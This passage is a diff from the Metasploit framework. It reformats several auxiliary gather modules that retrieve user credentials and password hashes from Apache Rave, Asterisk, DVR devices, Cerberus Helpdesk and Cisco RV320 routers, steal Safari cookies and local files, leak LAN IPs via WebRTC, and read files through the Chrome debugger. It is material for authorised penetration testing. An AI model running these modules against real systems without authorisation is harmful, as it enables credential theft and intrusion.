'Name' => 'Apache Rave User Information Disclosure',
'Description' => %q{
This module exploits an information disclosure in Apache Rave 0.20 and prior. The
vulnerability exists in the RPC API, which allows any authenticated user to
disclose information about all the users, including their password hashes. In order
to authenticate, the user can provide his own credentials. Also the default users
installed with Apache Rave 0.20 will be tried automatically. This module has been
successfully tested on Apache Rave 0.20.
},
'License' => MSF_LICENSE,
'Author' => [
'Andreas Guth', # Vulnerability discovery and PoC
'juan vazquez' # Metasploit module
],
'References' =>
[
'References' => [
[ 'CVE', '2013-1814' ],
[ 'OSVDB', '91235' ],
[ 'BID', '58455' ],
[ 'EDB', '24744']
]
))
)
)
register_options(
[
@@ -39,7 +40,8 @@ class MetasploitModule < Msf::Auxiliary
OptString.new('TARGETURI', [true, 'Path to Apache Rave Portal', '/portal']),
OptString.new('USERNAME', [ false, 'Apache Rave Username' ]),
OptString.new('PASSWORD', [ false, 'Apache Rave Password' ]),
])
]
)
end
def post_auth?
@@ -50,8 +52,8 @@ class MetasploitModule < Msf::Auxiliary
uri = normalize_uri(target_uri.to_s, "j_spring_security_check")
res = send_request_cgi({
'uri' => uri,
'method' => 'POST',
'uri' => uri,
'method' => 'POST',
'vars_post' => {
'j_password' => username,
'j_username' => password
@@ -69,8 +71,8 @@ class MetasploitModule < Msf::Auxiliary
uri = normalize_uri(target_uri.to_s, "app", "api", "rpc", "users", "get")
res = send_request_cgi({
'uri' => uri,
'method' => 'GET',
'uri' => uri,
'method' => 'GET',
'vars_get' => {
'offset' => "#{offset}"
},
@@ -82,7 +84,6 @@ class MetasploitModule < Msf::Auxiliary
else
return nil
end
end
def setup
@@ -130,20 +131,18 @@ class MetasploitModule < Msf::Auxiliary
create_credential_login(login_data)
end
def run
print_status("#{rhost}:#{rport} - Fingerprinting...")
res = send_request_cgi({
'uri' => normalize_uri(target_uri.to_s, "login"),
'method' => 'GET',
'uri' => normalize_uri(target_uri.to_s, "login"),
'method' => 'GET',
})
if not res
print_error("#{rhost}:#{rport} - No response, aborting...")
return
elsif res.code == 200 and res.body =~ /<span>Apache Rave ([0-9\.]*)<\/span>/
version =$1
version = $1
if version <= "0.20"
print_good("#{rhost}:#{rport} - Apache Rave #{version} found. Vulnerable. Proceeding...")
else
@@ -229,6 +228,5 @@ class MetasploitModule < Msf::Auxiliary
end
end
end
end
modules/auxiliary/gather/apple_safari_ftp_url_cookie_theft.rb
+36 -39
View File
@@ -3,38 +3,40 @@
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::FtpServer
include Msf::Auxiliary::Report
def initialize(info={})
super(update_info(info,
'Name' => 'Apple OSX/iOS/Windows Safari Non-HTTPOnly Cookie Theft',
'Description' => %q{
A vulnerability exists in versions of OSX, iOS, and Windows Safari released
before April 8, 2015 that allows the non-HTTPOnly cookies of any
domain to be stolen.
},
'License' => MSF_LICENSE,
'Author' => [
'Jouko Pynnonen', # Initial discovery and disclosure
'joev', # msf module
],
'References' => [
[ 'CVE', '2015-1126' ],
[ 'URL', 'https://seclists.org/fulldisclosure/2015/Apr/30' ]
],
'Actions' => [[ 'WebServer', 'Description' => 'Serve exploit via web server' ]],
'PassiveActions' => [ 'WebServer' ],
'DefaultAction' => 'WebServer',
'DisclosureDate' => '2015-04-08'
))
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Apple OSX/iOS/Windows Safari Non-HTTPOnly Cookie Theft',
'Description' => %q{
A vulnerability exists in versions of OSX, iOS, and Windows Safari released
before April 8, 2015 that allows the non-HTTPOnly cookies of any
domain to be stolen.
},
'License' => MSF_LICENSE,
'Author' => [
'Jouko Pynnonen', # Initial discovery and disclosure
'joev', # msf module
],
'References' => [
[ 'CVE', '2015-1126' ],
[ 'URL', 'https://seclists.org/fulldisclosure/2015/Apr/30' ]
],
'Actions' => [[ 'WebServer', 'Description' => 'Serve exploit via web server' ]],
'PassiveActions' => [ 'WebServer' ],
'DefaultAction' => 'WebServer',
'DisclosureDate' => '2015-04-08'
)
)
register_options([
OptString.new('URIPATH', [false, 'The URI to use for this exploit (default is random)']),
OptPort.new('SRVPORT', [true, 'The local port to use for the FTP server', 5555 ]),
OptPort.new('HTTPPORT', [true, 'The HTTP server port', 8080]),
OptPort.new('SRVPORT', [true, 'The local port to use for the FTP server', 5555 ]),
OptPort.new('HTTPPORT', [true, 'The HTTP server port', 8080]),
OptString.new('TARGET_DOMAINS', [
true,
'The comma-separated list of domains to steal non-HTTPOnly cookies from.',
@@ -43,7 +45,6 @@ class MetasploitModule < Msf::Auxiliary
])
end
#
# Start the FTP and HTTP server
#
@@ -54,12 +55,11 @@ class MetasploitModule < Msf::Auxiliary
@http_service.wait
end
#
# Handle the HTTP request and return a response. Code borrowed from:
# msf/core/exploit/http/server.rb
#
def start_http(opts={})
def start_http(opts = {})
# Ensture all dependencies are present before initializing HTTP
use_zlib
@@ -74,7 +74,7 @@ class MetasploitModule < Msf::Auxiliary
opts = {
'ServerHost' => datastore['SRVHOST'],
'ServerPort' => datastore['HTTPPORT'],
'Comm' => comm
'Comm' => comm
}.update(opts)
# Start a new HTTP server
@@ -84,7 +84,7 @@ class MetasploitModule < Msf::Auxiliary
opts['ServerHost'],
datastore['SSL'],
{
'Msf' => framework,
'Msf' => framework,
'MsfExploit' => self,
},
opts['Comm'],
@@ -97,8 +97,8 @@ class MetasploitModule < Msf::Auxiliary
# provided.
uopts = {
'Proc' => Proc.new { |cli, req|
on_request_uri(cli, req)
},
on_request_uri(cli, req)
},
'Path' => resource_uri
}.update(opts['Uri'] || {})
@@ -117,10 +117,10 @@ class MetasploitModule < Msf::Auxiliary
#
# Lookup the right address for the client
#
def lookup_lhost(c=nil)
def lookup_lhost(c = nil)
# Get the source address
if datastore['SRVHOST'] == '0.0.0.0'
Rex::Socket.source_address( c || '50.50.50.50')
Rex::Socket.source_address(c || '50.50.50.50')
else
datastore['SRVHOST']
end
@@ -162,7 +162,6 @@ class MetasploitModule < Msf::Auxiliary
end
end
#
# Ensures that gzip can be used. If not, an exception is generated. The
# exception is only raised if the DisableGzip advanced option has not been
@@ -174,19 +173,17 @@ class MetasploitModule < Msf::Auxiliary
end
end
#
# Returns the configured (or random, if not configured) URI path
#
def resource_uri
return @uri_path if @uri_path
@uri_path = datastore['URIPATH'] || Rex::Text.rand_text_alphanumeric(8+rand(8))
@uri_path = datastore['URIPATH'] || Rex::Text.rand_text_alphanumeric(8 + rand(8))
@uri_path = '/' + @uri_path if @uri_path !~ /^\//
@uri_path
end
#
# Handle HTTP requests and responses
#
@@ -228,7 +225,7 @@ class MetasploitModule < Msf::Auxiliary
#
# Create an HTTP response and then send it
#
def send_response(cli, code, message='OK', html='')
def send_response(cli, code, message = 'OK', html = '')
proto = Rex::Proto::Http::DefaultProtocol
res = Rex::Proto::Http::Response.new(code, message, proto)
res['Content-Type'] = 'text/html'
modules/auxiliary/gather/apple_safari_webarchive_uxss.rb
+23 -21
View File
@@ -12,28 +12,31 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'Mac OS X Safari .webarchive File Format UXSS',
'Description' => %q{
Generates a .webarchive file for Mac OS X Safari that will attempt to
inject cross-domain Javascript (UXSS), silently install a browser
extension, collect user information, steal the cookie database,
and steal arbitrary local files.
super(
update_info(
info,
'Name' => 'Mac OS X Safari .webarchive File Format UXSS',
'Description' => %q{
Generates a .webarchive file for Mac OS X Safari that will attempt to
inject cross-domain Javascript (UXSS), silently install a browser
extension, collect user information, steal the cookie database,
and steal arbitrary local files.
When opened on the target machine the webarchive file must not have the
quarantine attribute set, as this forces the webarchive to execute in a
sandbox.
},
'License' => MSF_LICENSE,
'Author' => 'joev',
'References' =>
[
When opened on the target machine the webarchive file must not have the
quarantine attribute set, as this forces the webarchive to execute in a
sandbox.
},
'License' => MSF_LICENSE,
'Author' => 'joev',
'References' => [
['URL', 'https://www.rapid7.com/blog/post/2013/04/25/abusing-safaris-webarchive-file-format/']
],
'DisclosureDate' => '2013-02-22',
'Actions' => [[ 'WebServer', 'Description' => 'Serve exploit via web server' ]],
'PassiveActions' => [ 'WebServer' ],
'DefaultAction' => 'WebServer'))
'DisclosureDate' => '2013-02-22',
'Actions' => [[ 'WebServer', 'Description' => 'Serve exploit via web server' ]],
'PassiveActions' => [ 'WebServer' ],
'DefaultAction' => 'WebServer'
)
)
end
def run
@@ -71,7 +74,7 @@ class MetasploitModule < Msf::Auxiliary
# @return [String] filename where we are storing the data
def record_data(data, cli)
if data.is_a? Hash
file = File.basename(data.keys.first).gsub(/[^A-Za-z]/,'')
file = File.basename(data.keys.first).gsub(/[^A-Za-z]/, '')
end
store_loot(
file || "data", "text/plain", cli.peerhost, data, "safari_webarchive", "Webarchive Collected Data"
@@ -100,5 +103,4 @@ class MetasploitModule < Msf::Auxiliary
end
end
end
modules/auxiliary/gather/asterisk_creds.rb
+37 -32
View File
@@ -8,21 +8,24 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'Asterisk Gather Credentials',
'Description' => %q{
This module retrieves SIP and IAX2 user extensions and credentials from
Asterisk Call Manager service. Valid manager credentials are required.
},
'Author' => 'bcoles',
'References' =>
[
super(
update_info(
info,
'Name' => 'Asterisk Gather Credentials',
'Description' => %q{
This module retrieves SIP and IAX2 user extensions and credentials from
Asterisk Call Manager service. Valid manager credentials are required.
},
'Author' => 'bcoles',
'References' => [
['URL', 'http://www.asterisk.name/sip1.html'],
['URL', 'http://www.asterisk.name/iax2.html'],
['URL', 'https://www.voip-info.org/wiki/view/Asterisk+manager+API'],
['URL', 'https://www.voip-info.org/wiki-Asterisk+CLI']
],
'License' => MSF_LICENSE))
'License' => MSF_LICENSE
)
)
register_options [
Opt::RPORT(5038),
OptString.new('USERNAME', [true, 'The username for Asterisk Call Manager', 'admin']),
@@ -59,17 +62,19 @@ class MetasploitModule < Msf::Auxiliary
print_status "Found #{@users.length} users"
cred_table = Rex::Text::Table.new 'Header' => 'Asterisk User Credentials',
'Indent' => 1,
cred_table = Rex::Text::Table.new 'Header' => 'Asterisk User Credentials',
'Indent' => 1,
'Columns' => ['Username', 'Secret', 'Type']
@users.each do |user|
cred_table << [ user['username'],
user['password'],
user['type'] ]
report_cred user: user['username'],
cred_table << [
user['username'],
user['password'],
user['type']
]
report_cred user: user['username'],
password: user['password'],
proof: "#{user['type']} show users"
proof: "#{user['type']} show users"
end
print_line
@@ -100,25 +105,25 @@ class MetasploitModule < Msf::Auxiliary
def report_cred(opts)
service_data = {
address: rhost,
port: rport,
address: rhost,
port: rport,
service_name: 'asterisk_manager',
protocol: 'tcp',
protocol: 'tcp',
workspace_id: myworkspace_id
}
credential_data = {
origin_type: :service,
origin_type: :service,
module_fullname: fullname,
username: opts[:user],
private_data: opts[:password],
private_type: :password
username: opts[:user],
private_data: opts[:password],
private_type: :password
}.merge service_data
login_data = {
core: create_credential(credential_data),
status: Metasploit::Model::Login::Status::UNTRIED,
proof: opts[:proof]
core: create_credential(credential_data),
status: Metasploit::Model::Login::Status::UNTRIED,
proof: opts[:proof]
}.merge service_data
create_credential_login login_data
@@ -152,14 +157,14 @@ class MetasploitModule < Msf::Auxiliary
return false unless res =~ /Response: Success/
report_cred user: username,
report_cred user: username,
password: password,
proof: 'Response: Success'
proof: 'Response: Success'
report_service :host => rhost,
:port => rport,
report_service :host => rhost,
:port => rport,
:proto => 'tcp',
:name => 'asterisk'
:name => 'asterisk'
true
end
modules/auxiliary/gather/avtech744_dvr_accounts.rb
+15 -13
View File
@@ -8,21 +8,23 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'AVTECH 744 DVR Account Information Retrieval',
'Description' => %q{
This module will extract the account information from the AVTECH 744 DVR devices,
including usernames, cleartext passwords, and the device PIN, along with
a few other miscellaneous details. In order to extract the information, hardcoded
credentials admin/admin are used. These credentials can't be changed from the device
console UI nor from the web UI.
},
'Author' => [ 'nstarke' ],
'License' => MSF_LICENSE
))
super(
update_info(
info,
'Name' => 'AVTECH 744 DVR Account Information Retrieval',
'Description' => %q{
This module will extract the account information from the AVTECH 744 DVR devices,
including usernames, cleartext passwords, and the device PIN, along with
a few other miscellaneous details. In order to extract the information, hardcoded
credentials admin/admin are used. These credentials can't be changed from the device
console UI nor from the web UI.
},
'Author' => [ 'nstarke' ],
'License' => MSF_LICENSE
)
)
end
def run
res = send_request_cgi({
'method' => 'POST',
modules/auxiliary/gather/browser_info.rb
+20 -18
View File
@@ -6,28 +6,30 @@
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::BrowserExploitServer
def initialize(info={})
super(update_info(info,
'Name' => "HTTP Client Information Gather",
'Description' => %q{
This module gathers information about a browser that exploits might be interested in, such
as OS name, browser version, plugins, etc. By default, the module will return a fake 404,
but you can customize this output by changing the Custom404 datastore option, and
redirect to an external web page.
},
'License' => MSF_LICENSE,
'Author' => [ 'sinn3r' ],
'DisclosureDate' => '2016-03-22',
'Actions' =>
[
def initialize(info = {})
super(
update_info(
info,
'Name' => "HTTP Client Information Gather",
'Description' => %q{
This module gathers information about a browser that exploits might be interested in, such
as OS name, browser version, plugins, etc. By default, the module will return a fake 404,
but you can customize this output by changing the Custom404 datastore option, and
redirect to an external web page.
},
'License' => MSF_LICENSE,
'Author' => [ 'sinn3r' ],
'DisclosureDate' => '2016-03-22',
'Actions' => [
[
'WebServer',
'Description' => 'A web server that collects information about the browser.'
'Description' => 'A web server that collects information about the browser.'
]
],
'PassiveActions' => [ 'WebServer' ],
'DefaultAction' => 'WebServer'
))
'PassiveActions' => [ 'WebServer' ],
'DefaultAction' => 'WebServer'
)
)
end
def is_key_wanted?(key)
modules/auxiliary/gather/browser_lanipleak.rb
+84 -84
View File
@@ -10,25 +10,25 @@ class MetasploitModule < Msf::Auxiliary
super(
update_info(
info,
'Name' => 'HTTP Client LAN IP Address Gather',
'Description' => %q(
'Name' => 'HTTP Client LAN IP Address Gather',
'Description' => %q{
This module retrieves a browser's network interface IP addresses
using WebRTC.
),
'License' => MSF_LICENSE,
'Author' => [
},
'License' => MSF_LICENSE,
'Author' => [
'Daniel Roesler', # JS Code
'Dhiraj Mishra' # MSF Module
],
'References' => [
[ 'CVE', '2018-6849' ],
[ 'URL', 'http://net.ipcalf.com/' ],
[ 'URL', 'https://www.inputzero.io/p/private-ip-leakage-using-webrtc.html' ]
],
],
'References' => [
[ 'CVE', '2018-6849' ],
[ 'URL', 'http://net.ipcalf.com/' ],
[ 'URL', 'https://www.inputzero.io/p/private-ip-leakage-using-webrtc.html' ]
],
'DisclosureDate' => '2013-09-05',
'Actions' => [[ 'WebServer', 'Description' => 'Serve exploit via web server' ]],
'Actions' => [[ 'WebServer', 'Description' => 'Serve exploit via web server' ]],
'PassiveActions' => [ 'WebServer' ],
'DefaultAction' => 'WebServer'
'DefaultAction' => 'WebServer'
)
)
end
@@ -38,94 +38,94 @@ class MetasploitModule < Msf::Auxiliary
end
def setup
# code from: https://github.com/diafygi/webrtc-ips
@html = <<-JS
<script>
//get the IP addresses associated with an account
function getIPs(callback){
var ip_dups = {};
# code from: https://github.com/diafygi/webrtc-ips
@html = <<~JS
<script>
//get the IP addresses associated with an account
function getIPs(callback){
var ip_dups = {};
//compatibility for firefox and chrome
var RTCPeerConnection = window.RTCPeerConnection
|| window.mozRTCPeerConnection
|| window.webkitRTCPeerConnection;
var useWebKit = !!window.webkitRTCPeerConnection;
//compatibility for firefox and chrome
var RTCPeerConnection = window.RTCPeerConnection
|| window.mozRTCPeerConnection
|| window.webkitRTCPeerConnection;
var useWebKit = !!window.webkitRTCPeerConnection;
//bypass naive webrtc blocking using an iframe
if(!RTCPeerConnection){
//NOTE: you need to have an iframe in the page right above the script tag
//
//<iframe id="iframe" sandbox="allow-same-origin" style="display: none"></iframe>
//<script>...getIPs called in here...
//
var win = iframe.contentWindow;
RTCPeerConnection = win.RTCPeerConnection
|| win.mozRTCPeerConnection
|| win.webkitRTCPeerConnection;
useWebKit = !!win.webkitRTCPeerConnection;
}
//bypass naive webrtc blocking using an iframe
if(!RTCPeerConnection){
//NOTE: you need to have an iframe in the page right above the script tag
//
//<iframe id="iframe" sandbox="allow-same-origin" style="display: none"></iframe>
//<script>...getIPs called in here...
//
var win = iframe.contentWindow;
RTCPeerConnection = win.RTCPeerConnection
|| win.mozRTCPeerConnection
|| win.webkitRTCPeerConnection;
useWebKit = !!win.webkitRTCPeerConnection;
}
//minimal requirements for data connection
var mediaConstraints = {
optional: [{RtpDataChannels: true}]
};
//minimal requirements for data connection
var mediaConstraints = {
optional: [{RtpDataChannels: true}]
};
var servers = {iceServers: [{urls: "stun:stun.services.mozilla.com"}]};
var servers = {iceServers: [{urls: "stun:stun.services.mozilla.com"}]};
//construct a new RTCPeerConnection
var pc = new RTCPeerConnection(servers, mediaConstraints);
//construct a new RTCPeerConnection
var pc = new RTCPeerConnection(servers, mediaConstraints);
function handleCandidate(candidate){
//match just the IP address
var ip_regex = /([0-9]{1,3}(\\.[0-9]{1,3}){3}|[a-f0-9]{1,4}(:[a-f0-9]{1,4}){7})/
var ip_addr = ip_regex.exec(candidate)[1];
function handleCandidate(candidate){
//match just the IP address
var ip_regex = /([0-9]{1,3}(\\.[0-9]{1,3}){3}|[a-f0-9]{1,4}(:[a-f0-9]{1,4}){7})/
var ip_addr = ip_regex.exec(candidate)[1];
//remove duplicates
if(ip_dups[ip_addr] === undefined)
callback(ip_addr);
//remove duplicates
if(ip_dups[ip_addr] === undefined)
callback(ip_addr);
ip_dups[ip_addr] = true;
}
ip_dups[ip_addr] = true;
}
//listen for candidate events
pc.onicecandidate = function(ice){
//listen for candidate events
pc.onicecandidate = function(ice){
//skip non-candidate events
if(ice.candidate)
handleCandidate(ice.candidate.candidate);
};
//skip non-candidate events
if(ice.candidate)
handleCandidate(ice.candidate.candidate);
};
//create a bogus data channel
pc.createDataChannel("");
//create a bogus data channel
pc.createDataChannel("");
//create an offer sdp
pc.createOffer(function(result){
//create an offer sdp
pc.createOffer(function(result){
//trigger the stun server request
pc.setLocalDescription(result, function(){}, function(){});
//trigger the stun server request
pc.setLocalDescription(result, function(){}, function(){});
}, function(){});
}, function(){});
//wait for a while to let everything done
setTimeout(function(){
//read candidate info from local description
var lines = pc.localDescription.sdp.split('\\n');
//wait for a while to let everything done
setTimeout(function(){
//read candidate info from local description
var lines = pc.localDescription.sdp.split('\\n');
lines.forEach(function(line){
if(line.indexOf('a=candidate:') === 0)
handleCandidate(line);
});
}, 1000);
}
lines.forEach(function(line){
if(line.indexOf('a=candidate:') === 0)
handleCandidate(line);
});
}, 1000);
}
getIPs(function(ip){
//console.log(ip);
var xmlhttp = new XMLHttpRequest;
xmlhttp.open('POST', window.location, true);
xmlhttp.send(ip);
});
</script>
JS
getIPs(function(ip){
//console.log(ip);
var xmlhttp = new XMLHttpRequest;
xmlhttp.open('POST', window.location, true);
xmlhttp.send(ip);
});
</script>
JS
end
def on_request_uri(cli, request)
modules/auxiliary/gather/c2s_dvr_password_disclosure.rb
+14 -15
View File
@@ -10,19 +10,18 @@ class MetasploitModule < Msf::Auxiliary
def initialize
super(
'Name' => 'C2S DVR Management Password Disclosure',
'Description' => %q{
'Name' => 'C2S DVR Management Password Disclosure',
'Description' => %q{
C2S DVR allows an unauthenticated user to disclose the username
& password by requesting the javascript page 'read.cgi?page=2'.
This may also work on some cameras including IRDOME-II-C2S, IRBOX-II-C2S.
},
'References' => [['EDB', '40265']],
'Author' =>
[
'Yakir Wizman', # discovery
'h00die', # module
],
'License' => MSF_LICENSE,
'References' => [['EDB', '40265']],
'Author' => [
'Yakir Wizman', # discovery
'h00die', # module
],
'License' => MSF_LICENSE,
'DisclosureDate' => 'Aug 19 2016'
)
@@ -36,8 +35,8 @@ class MetasploitModule < Msf::Auxiliary
url = normalize_uri(datastore['TARGETURI'], 'cgi-bin', 'read.cgi')
vprint_status("Attempting to load data from #{url}?page=2")
res = send_request_cgi({
'uri' => url,
'vars_get' => {'page'=>'2'}
'uri' => url,
'vars_get' => { 'page' => '2' }
})
unless res
print_error("#{peer} Unable to connect to #{url}")
@@ -52,8 +51,8 @@ class MetasploitModule < Msf::Auxiliary
if res.body =~ /pw_adminpw = "(.+?)";/
print_good("Found: admin:#{$1}")
store_valid_credential(
user: 'admin',
private: $1,
user: 'admin',
private: $1,
private_type: :password
)
end
@@ -61,8 +60,8 @@ class MetasploitModule < Msf::Auxiliary
if res.body =~ /pw_userpw = "(.+?)";/
print_good("Found: user:#{$1}")
store_valid_credential(
user: 'user',
private: $1,
user: 'user',
private: $1,
private_type: :password
)
end
modules/auxiliary/gather/cerberus_helpdesk_hash_disclosure.rb
+17 -19
View File
@@ -10,29 +10,28 @@ class MetasploitModule < Msf::Auxiliary
def initialize
super(
'Name' => 'Cerberus Helpdesk User Hash Disclosure',
'Description' => %q{
'Name' => 'Cerberus Helpdesk User Hash Disclosure',
'Description' => %q{
This module extracts usernames and password hashes from the Cerberus Helpdesk
through an unauthenticated access to a workers file.
Verified on Version 4.2.3 Stable (Build 925) and 5.4.4
},
'References' =>
[
[ 'EDB', '39526' ]
],
'Author' =>
[
'asdizzle_', # discovery
'h00die', # module
],
'License' => MSF_LICENSE,
'References' => [
[ 'EDB', '39526' ]
],
'Author' => [
'asdizzle_', # discovery
'h00die', # module
],
'License' => MSF_LICENSE,
'DisclosureDate' => 'Mar 7 2016'
)
register_options(
[
OptString.new('TARGETURI', [false, 'URL of the Cerberus Helpdesk root', '/'])
])
]
)
end
def run_host(rhost)
@@ -40,7 +39,7 @@ class MetasploitModule < Msf::Auxiliary
['devblocks', 'zend'].each do |site|
url = normalize_uri(datastore['TARGETURI'], 'storage', 'tmp', "#{site}_cache---ch_workers")
vprint_status("Attempting to load data from #{url}")
res = send_request_cgi({'uri' => url})
res = send_request_cgi({ 'uri' => url })
if !res
print_error("#{peer} Unable to connect to #{url}")
next
@@ -51,8 +50,8 @@ class MetasploitModule < Msf::Auxiliary
next
end
cred_table = Rex::Text::Table.new 'Header' => 'Cerberus Helpdesk User Credentials',
'Indent' => 1,
cred_table = Rex::Text::Table.new 'Header' => 'Cerberus Helpdesk User Credentials',
'Indent' => 1,
'Columns' => ['Username', 'Password Hash']
# the returned object looks json-ish, but it isn't. Unsure of format, so we'll do some ugly manual parsing.
@@ -66,8 +65,8 @@ class MetasploitModule < Msf::Auxiliary
password_hash = cred[7].tr('";', '') # remove extra characters
print_good("Found: #{username}:#{password_hash}")
store_valid_credential(
user: username,
private: password_hash,
user: username,
private: password_hash,
private_type: :nonreplayable_hash
)
cred_table << [username, password_hash]
@@ -77,7 +76,6 @@ class MetasploitModule < Msf::Auxiliary
print_line cred_table.to_s
break
end
rescue ::Rex::ConnectionError
print_error("#{peer} Unable to connect to site")
return
modules/auxiliary/gather/checkpoint_hostname.rb
+25 -21
View File
@@ -8,33 +8,36 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'CheckPoint Firewall-1 SecuRemote Topology Service Hostname Disclosure',
'Description' => %q{
This module sends a query to the port 264/TCP on CheckPoint Firewall-1
firewalls to obtain the firewall name and management station
(such as SmartCenter) name via a pre-authentication request. The string
returned is the CheckPoint Internal CA CN for SmartCenter and the firewall
host. Whilst considered "public" information, the majority of installations
use detailed hostnames which may aid an attacker in focusing on compromising
the SmartCenter host, or useful for government, intelligence and military
networks where the hostname reveals the physical location and rack number
of the device, which may be unintentionally published to the world.
},
'Author' => [ 'aushack' ],
'DisclosureDate' => '2011-12-14', # Looks like this module is first real reference
'References' =>
[
super(
update_info(
info,
'Name' => 'CheckPoint Firewall-1 SecuRemote Topology Service Hostname Disclosure',
'Description' => %q{
This module sends a query to the port 264/TCP on CheckPoint Firewall-1
firewalls to obtain the firewall name and management station
(such as SmartCenter) name via a pre-authentication request. The string
returned is the CheckPoint Internal CA CN for SmartCenter and the firewall
host. Whilst considered "public" information, the majority of installations
use detailed hostnames which may aid an attacker in focusing on compromising
the SmartCenter host, or useful for government, intelligence and military
networks where the hostname reveals the physical location and rack number
of the device, which may be unintentionally published to the world.
},
'Author' => [ 'aushack' ],
'DisclosureDate' => '2011-12-14', # Looks like this module is first real reference
'References' => [
# aushack - None? Stumbled across, probably an old bug/feature but unsure.
[ 'URL', 'https://web.archive.org/web/20120508142715/http://www.osisecurity.com.au/advisories/checkpoint-firewall-securemote-hostname-information-disclosure' ],
[ 'URL', 'https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk69360' ]
]
))
)
)
register_options(
[
Opt::RPORT(264),
])
]
)
end
def autofilter
@@ -65,15 +68,16 @@ class MetasploitModule < Msf::Auxiliary
print_error("Unexpected response: '#{res.inspect}'")
end
report_info(fw_hostname,sc_hostname)
report_info(fw_hostname, sc_hostname)
disconnect
end
# Only trust that it's real if we have a hostname. If you get a funny
# response, it might not be what we think it is.
def report_info(fw_hostname,sc_hostname)
def report_info(fw_hostname, sc_hostname)
return unless fw_hostname
host_info = {
:host => datastore['RHOST'],
:os_name => "Checkpoint Firewall-1",
modules/auxiliary/gather/chrome_debugger.rb
+18 -15
View File
@@ -10,20 +10,23 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Chrome Debugger Arbitrary File Read / Arbitrary Web Request',
'Description' => %q{
This module uses the Chrome Debugger's API to read
files off the remote file system, or to make web requests
from a remote machine. Useful for cloud metadata endpoints!
},
'Author' => [
'Adam Baldwin (Evilpacket)', # Original ideas, research, proof of concept, and msf module
'Nicholas Starke (The King Pig Demon)' # msf module
],
'DisclosureDate' => '2019-09-24',
'License' => MSF_LICENSE
))
super(
update_info(
info,
'Name' => 'Chrome Debugger Arbitrary File Read / Arbitrary Web Request',
'Description' => %q{
This module uses the Chrome Debugger's API to read
files off the remote file system, or to make web requests
from a remote machine. Useful for cloud metadata endpoints!
},
'Author' => [
'Adam Baldwin (Evilpacket)', # Original ideas, research, proof of concept, and msf module
'Nicholas Starke (The King Pig Demon)' # msf module
],
'DisclosureDate' => '2019-09-24',
'License' => MSF_LICENSE
)
)
register_options(
[
@@ -86,7 +89,7 @@ class MetasploitModule < Msf::Auxiliary
'id' => id,
'method' => 'Page.navigate',
'params' => {
url: fetch_uri
url: fetch_uri
}
}.to_json)
end
modules/auxiliary/gather/cisco_rv320_config.rb
+19 -18
View File
@@ -7,9 +7,11 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Cisco RV320/RV326 Configuration Disclosure',
'Description' => %q{
super(
update_info(
info,
'Name' => 'Cisco RV320/RV326 Configuration Disclosure',
'Description' => %q{
A vulnerability in the web-based management interface of Cisco Small Business
RV320 and RV325 Dual Gigabit WAN VPN routers could allow an unauthenticated,
remote attacker to retrieve sensitive information. The vulnerability is due
@@ -19,14 +21,12 @@ class MetasploitModule < Msf::Auxiliary
download the router configuration or detailed diagnostic information. Cisco
has released firmware updates that address this vulnerability.
},
'Author' =>
[
'Author' => [
'RedTeam Pentesting GmbH <release@redteam-pentesting.de>',
'Aaron Soto <asoto@rapid7.com>'
],
'License' => MSF_LICENSE,
'References' =>
[
'License' => MSF_LICENSE,
'References' => [
['EDB', '46262'],
['BID', '106732'],
['CVE', '2019-1653'],
@@ -34,18 +34,19 @@ class MetasploitModule < Msf::Auxiliary
['URL', 'https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvg42801'],
['URL', 'https://www.cisco.com/c/en/us/support/docs/csa/cisco-sa-20110330-acs.html']
],
'DisclosureDate' => '2019-01-24',
'DefaultOptions' =>
{
'SSL' => true
'DisclosureDate' => '2019-01-24',
'DefaultOptions' => {
'SSL' => true
}
))
)
)
register_options(
[
Opt::RPORT(443),
OptString.new('TARGETURI', [true, 'Path to the device configuration file', '/cgi-bin/config.exp']),
])
]
)
end
def report_cred(user, hash)
@@ -100,8 +101,8 @@ class MetasploitModule < Msf::Auxiliary
begin
uri = normalize_uri(target_uri.path)
res = send_request_cgi({
'uri' => uri,
'method' => 'GET',
'uri' => uri,
'method' => 'GET',
}, 60)
rescue OpenSSL::SSL::SSLError
fail_with(Failure::UnexpectedReply, 'SSL handshake failed. Consider setting SSL to false and trying again.')
@@ -116,8 +117,8 @@ class MetasploitModule < Msf::Auxiliary
body = res.body
if body.match(/####sysconfig####/)
parse_config(body)
else body.include?"meta http-equiv=refresh content='0; url=/default.htm'"
fail_with(Failure::NotVulnerable, 'Response suggests device is patched')
else body.include? "meta http-equiv=refresh content='0; url=/default.htm'"
fail_with(Failure::NotVulnerable, 'Response suggests device is patched')
end
end
end
modules/auxiliary/gather/citrix_published_applications.rb
+16 -13
View File
@@ -7,23 +7,26 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::Udp
def initialize(info = {})
super(update_info(info,
'Name' => 'Citrix MetaFrame ICA Published Applications Scanner',
'Description' => %q{
This module attempts to query Citrix Metaframe ICA server to obtain
a published list of applications.
},
'Author' => [ 'aushack' ],
'References' =>
[
super(
update_info(
info,
'Name' => 'Citrix MetaFrame ICA Published Applications Scanner',
'Description' => %q{
This module attempts to query Citrix Metaframe ICA server to obtain
a published list of applications.
},
'Author' => [ 'aushack' ],
'References' => [
[ 'URL', 'http://www.securiteam.com/exploits/5CP0B1F80S.html' ],
]
))
)
)
register_options(
[
Opt::RPORT(1604),
])
]
)
end
def autofilter
@@ -46,7 +49,7 @@ class MetasploitModule < Msf::Auxiliary
udp_sock.put(client_connect)
